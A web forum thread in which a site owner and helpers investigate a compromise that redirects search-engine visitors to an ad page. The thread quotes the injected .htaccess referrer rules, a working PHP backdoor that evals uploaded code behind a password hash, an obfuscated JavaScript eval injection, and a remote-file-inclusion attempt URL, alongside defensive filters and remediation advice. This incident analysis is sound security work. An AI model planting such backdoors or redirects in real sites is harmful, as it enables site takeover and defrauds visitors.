Site hacked -- pretty ingenious search engine hacking

Nash · Regular Joined: Jan 10, 2006 Posts: 86

Hello all. So, my d*** site got hacked again after a long run without a major hack. This one is pretty ingenious (did a search for this -- didn't find anything). If you go to my site:

Only registered users can see links on this board!
Get registered or login to the forums!

, everything seems fine.

BUT, if you search for my site on Google (and this sucks because I am #1 on Google now for Bodyboarding), and click my link through there

Only registered users can see links on this board!
Get registered or login to the forums!

, you get this friggin page that a hacker set up on my site somehow that just lnks to a bunch of ad referral sites.

Questions:
1) How the heck do I fix this. Can't even tell where the problem is
2) How do I prevent this - most of my traffic is (was) Google driven
3) Since this hacker is making ad revenue through these ads, there mst be some way to trace him. I'd be willing to pay a few $ to trace it and bust this guy.

Thoughts? Please, please help. Thanks.

kguske · Site Admin Joined: Jun 04, 2004 Posts: 4887

Contact your host. This looks like a DNS problem.

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2853

That is very interesting trick. When I go through Google first, it looks like the ad page loads and is cached. All subsequent requests go there until I do a hard fresh (alt-F5).

I don't see anything obvious in the HTML. So it must be something in the PHP files themselves... some code that tracks referrals and redirects them.

Probably no way to track, but get access logs anyway. Look for anything suspicious (I know its a real manual process.. but until you can find the vulnerability, you don't know much). He could easily hide under a proxy IP or another server he has hacked

Nash · Regular Joined: Jan 10, 2006 Posts: 86

Hey everyone.

So, I was thinking ... rewrite problem. What rewrites? Let me check htaccess. Sure enough, there she was, inserted above my NukeSentinel htaccess code:

Code:

Options All -Indexes
DirectoryIndex index.php index.htm index.html
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /osc/images/apebu/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
RewriteRule ^/(.*)$ http://www.eastcoastbodyboarding.com/2004/$1 [L,R=301]

So, now the more important follow up questions:

1) what does this mean? Did someone hack into my actual FTP folder or host account?!?! I have a long alphanum password, so don't know how that could get cracked...

Can someone "insert" this type of stuff without comprising other stuff

2) Can I bust this b-stard?

3) Going through the raw logs ... have never done it, believe it or not. Would be grateful for guidance as to how to look through them (I know how to get them, just never had to "read" them before)

Thanks for the quick responses. Interesing hack!

Further update -- the rewrite rule appears to be accessing a file in an OSCommerce folder:

Only registered users can see links on this board!
Get registered or login to the forums!

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2853

1) Yes, it is possible they did. They could brute force the password, if your server has no protection against it

2) Probably not. Unless you can find him and declare some kind of monetary loss as a result, the police probably won't help. And likely the hacker isn't even in a country you could prosecute him

3) I usually start by filtering the obvious stuff. Delete lines that load images or whatever. Looks for any weird coding symbols, connections to remote files, etc. Probably that's the way the hacker got in rather than any FTP access.

You should change all the passwords and make sure your files are clean. Restore a clean backup if possible.

Edit: now that I look at it again, the place to start is the /osc/images directory where these ad files are stored. Maybe if you're running OSC, that is what was hacked

Nash · Regular Joined: Jan 10, 2006 Posts: 86

thanks so much -- so, looking at some of the site that this was referring to, my internet sleuth buddy thinks he found the culprit. A lot of the links point to this IP:

Only registered users can see links on this board!
Get registered or login to the forums!

which leads to this guy:

Only registered users can see links on this board!
Get registered or login to the forums!

He is very tech savvy, and owns a bunch of domains that these links pointed at...

I also found this site which had a similar problem:

Only registered users can see links on this board!
Get registered or login to the forums!

Doulos · Involved Joined: Jun 06, 2005 Posts: 373

I stopped using OSC because it was too much work trying to keep up with the holes hackers kept finding. It seemed like every time I looked there was another security warning. I am guessing that it would be ok, if you stay on top of all the updates (and your site is not one of the unlucky first ones the hackers find a new hole in). But, since I am a user, not a programmer - don't listen to me. Same with Coppermine. Though, when I tried to get rid of it my users threw a fit so I just make sure I do frequent backups - just in case.

Nash · Regular Joined: Jan 10, 2006 Posts: 86

yeah -- he accessed it again today after I changed my cpanel / ftp passwords to very long complex strings. must be some sort of injection into my htaccess file?

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2853

Must be a vulnerable file or a backdoor left on your system

Nash · Regular Joined: Jan 10, 2006 Posts: 86

OK -- so I have looked through my raw log files, but was unable to detect any patterns, nor coud I find anyone who specifically accessed my htaccess file in there. Should I be looking for "GET" or "POST" actions? Would anyone be willing to take a quick look at my logs?

My htaccess has been rewritten twice since I fixed it the first time.

Is there a way to tell when that happened and who did it?

Also, I have been looking through my "latest visitors" list in cpanel and found a few interesting things. One was a script on here: modules.php?name=http://amygirl.siteburg.com/images/cs.txt?
that someone tried to use but sentinel caught

The othe was very curious and looks very suspicious. It was this PHP file being accessed

Only registered users can see links on this board!
Get registered or login to the forums!

I checked out the code in this file and it is doing this:

Code:

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

Any ideas?

This is the IP that did it: 202.216.177.18

evaders99 · Moderator Joined: Apr 30, 2004 Posts: 2853

You should completely remove that file. It allows backdoor access into your site.
There must have been some vulnerability that allowed him to get this file on your server. But it's pretty much going through every access to see whether your site was vulnerable to a specific vulnerability

Nash · Regular Joined: Jan 10, 2006 Posts: 86

Thanks evaders -- removed that file and a couple of others like it. I think my problem is that I can't tell what a "normal" looking log entry is.

Just noticed that my NSN 2.4 was not set to do any automatic blocking. I will enable this. Think I should probably update my raven nuke as well

montego · Posted: Mon Jan 28, 2008 6:32 am

In looking at where they have placed this file, it sure does sound to me like a hole in OSC. Does OSC allow for image uploads, such as for products? If so, I am almost 100% positive that is where the hole is. Their image upload code isn't ensuring that the file is in fact an image. Sorry, but there is no excuse for that!

gotcha · Regular Joined: Mar 14, 2005 Posts: 79

Are you on shared hosting? Another possiblity is if the server isn't set up right it could be another user on the machine writing to the .htaccess and writable folders. It would be a good idea to check who the owner of that "yoyub.php" file is and if it isn't you, then you've found the problem. My ftp client shows owner and group so that is how I check. Another way to check is through ssh (if you have access), just cd to the directory of the file and use the command "ls -al".

bobbyg · Posted: Sat Feb 02, 2008 12:28 pm

If your IP address changes because you are hosting on your own computer/server and you do not have a dedicated IP via you ISP provider, you could easily be creating this problem whenever you shutdown. If you domain name is "parked" because it cannot find the IP address, Google will show "parked" by. Prior to December 2007 "wild west domains" sister to "goDaddy" had incorrect instructions on how to handle dns pointers.

Nash · Regular Joined: Jan 10, 2006 Posts: 86

thanks for the feedback everyone. Hosted on hostmonster.com.

I think that the hole was in the old OSC that I had sitting dormant on the site.

shshaun · New Member Joined: Feb 06, 2008 Posts: 1

Hi guys,

I also have come across this type malicious code.

I'm a web dev and one of my clients asked me to check why his site was redirecting to this black spammer blog type of site.. I took a look and found it only goes to black blogger type site from search engines, if you enter directly the URL it works fine..

So after more digging around looking for usual things like .htaccess files, index pages with redirects, etc. I found nothing.. then I asked my friend to take a look, and his AV reported trojan.js.redirector.e (kasperspy).. and reported the file.. so I checked the file and sure enough it looked like malicious code, so I ftp'd to the location and also discovered some other files..

I found some other people had the same problem:

Only registered users can see links on this board!
Get registered or login to the forums!

The funny thing is that my client does not have osCommerce or Wordpress installed on his site, only custom code.. No web apps what so ever.. (Unless the intruders some how compromised his phpMyadmin).. but just shortly before he asked me to check this problem he said he terminated his new programmer because of some problems.. so I'm guessing if this programmer is the creator of this code, or perhaps he planted it in retaliation to his termination.. hmm.. any way, the malicious files where placed in a different directory where js and images where stored and also the php scripts had different names from your guys (and others) findings..

After inspecting the the root .htaccess again I saw that the rules for the redirection were buried down in the file after spaces and line feeds.

montego · Posted: Wed Feb 06, 2008 6:48 pm

shshaun, interesting and definitely suspicious of the fired programmer. Hopefully they shut down his/her access immediately after.

Nash · Regular Joined: Jan 10, 2006 Posts: 86

yeah -- the inserted code into htaccess is after a lot of blank space to make it hard to find. When I downloaded my site files to check the backup, I also found some trojan files placed on there. Might have been kaspersky as well.

dad7732 · Worker Joined: Mar 18, 2007 Posts: 228

In order for a hacker running a script which is obvious here is to locate (by script) any/all files with 777 world writable permissions. Look in your OSC direcrtories for any files 777 and chmod to 775 or better. 775 is not even a guarantee but much better protection than 777.

Also, include this code at the beginning of your .htaccess file:

Code:

<Files ~ "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</Files>

This will at least give some protection in case anyone tries to read your .htaccess file. Don't know if this will prevent a script writing to it or not.

Jay

Nash · Regular Joined: Jan 10, 2006 Posts: 86

thanks!

Nash · Regular Joined: Jan 10, 2006 Posts: 86

just checked -- was already at 644

Nash · Regular Joined: Jan 10, 2006 Posts: 86

It's really amazing to me now that I have been monitoring my logs by hand now for a couple of weeks. Unfortunately, after I fix a hole, they find some new method to do the same thing a few days later.

The end result is that 1) mystery files end up on my server (see exhibit b)m and 2) my .htaccess gets code inserted into it.

The attacks come from a TON of IP addresses, I see patterns: a ton of GET requests through certain folders particularly "themes", "/shopping". Often, they look for a file osc/apebu/check.js (I deleted the OSC folder weeks ago). They get 404s on some files. Simultaneously, there are POST attempts. These have varied by the day, and could be unrelated. Today they were trying to post ("POST /shopping/admin/phpMyAdmin/namogofer.php HTTP/1.1" 401) and (POST /shopping/admin/includes/languages/english/images/namogofer.php HTTP/1.0" 401) alot, always resulting in a 401.

However, someone was able to get this through:
83.16.216.114 - - [07/Mar/2008:11:26:01 -0700] "POST /shopping/ext/modules/tise.php HTTP/1.1" 200 3172. (The code for this file was the same as exhibit b.)
Then this guy got through:
65.97.250.141 - - [07/Mar/2008:11:27:12 -0700] "POST /surfline/ijocun.php

Then, after lots of attempts, someone (IP: 220.237.237.109) got a 200, when GETing check.js, because the file has reappeared on my server: 220.237.237.109 - - [07/Mar/2008:14:07:43 -0700] "GET /osc/images/apebu/check.js HTTP/1.1" 200 1602

Only a few minutes before that file apparently didn't exist:
70.168.144.60 - - [07/Mar/2008:14:01:50 -0700] "GET /osc/images/apebu/check.js HTTP/1.1" 404
71.126.114.178 - - [07/Mar/2008:14:07:14 -0700] "GET /osc/images/apebu/check.js HTTP/1.0" 404

I have also found that tons of my .js files are infected/injected with code like in exhibit a

Check.js code is in exhibit b below. It is the same as tise.php and the other random files I've found them post. Sometimes I can see the file appear with POST, sometimes not.

I also found some odd code in another seemingly legit file they accessed called general.js. The code that I think they inserted is in exhibit a.

Exhibit a

Code:

/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%35%32%35%36%37%3B%20%4A%53%53%33%20%3D%20%27%2F%6F%73%63%2F%69%6D%61%67%65%73%2F%61%70%65%62%75%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%6F%73%63%2F%69%6D%61%67%65%73%2F%61%70%65%62%75%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */

In this latest round, I can't quite tell where it is. If someone would be willing to look at the logs with me, that would be awesome. Free shirt to whomever can, haha. The thing is, from the logs, I can't tell how htaccess is having code inserted into it, as htaccess never shows up. All I see are these files:

Exhibit B

Code:

<?php
error_reporting(1);
global $HTTP_SERVER_VARS;

function say($t) { echo "$t\n"; };

function testdata($t) {
say(md5("testdata_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }
else{ testdata('f'); }; }
else{testdata('pass'); };
testdata('end');
echo "</pre>"; ?>

A link to a site with someone else trying to understand this code, and the md5 condition.

Only registered users can see links on this board!
Get registered or login to the forums!

.

I am trying to follow this code, but am unfamiliar with some functions. I will look them up. What does it mean when they do testdata_$t ?? I don't understand the _$t part of that.

Nash · Regular Joined: Jan 10, 2006 Posts: 86

Wow -- since posting this original thread, I have found a ton of other people recently experiencing the same problem.

This page has some good info:

Only registered users can see links on this board!
Get registered or login to the forums!

He suggests putting this in htaccess:

Code:

RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /------------http----------- [F,NC]
RewriteRule http: /---------http----------- [F,NC]

or adding this to all php files

Code:

Header("X-Powered-by: safe_http"); //Hide PHP-Version
if(preg_match("/http:/i", urldecode(getenv("REQUEST_URI").getenv("QUERY_STRING"))))
{
Header( "HTTP/1.1 503 Service Unavailable" );
exit;
}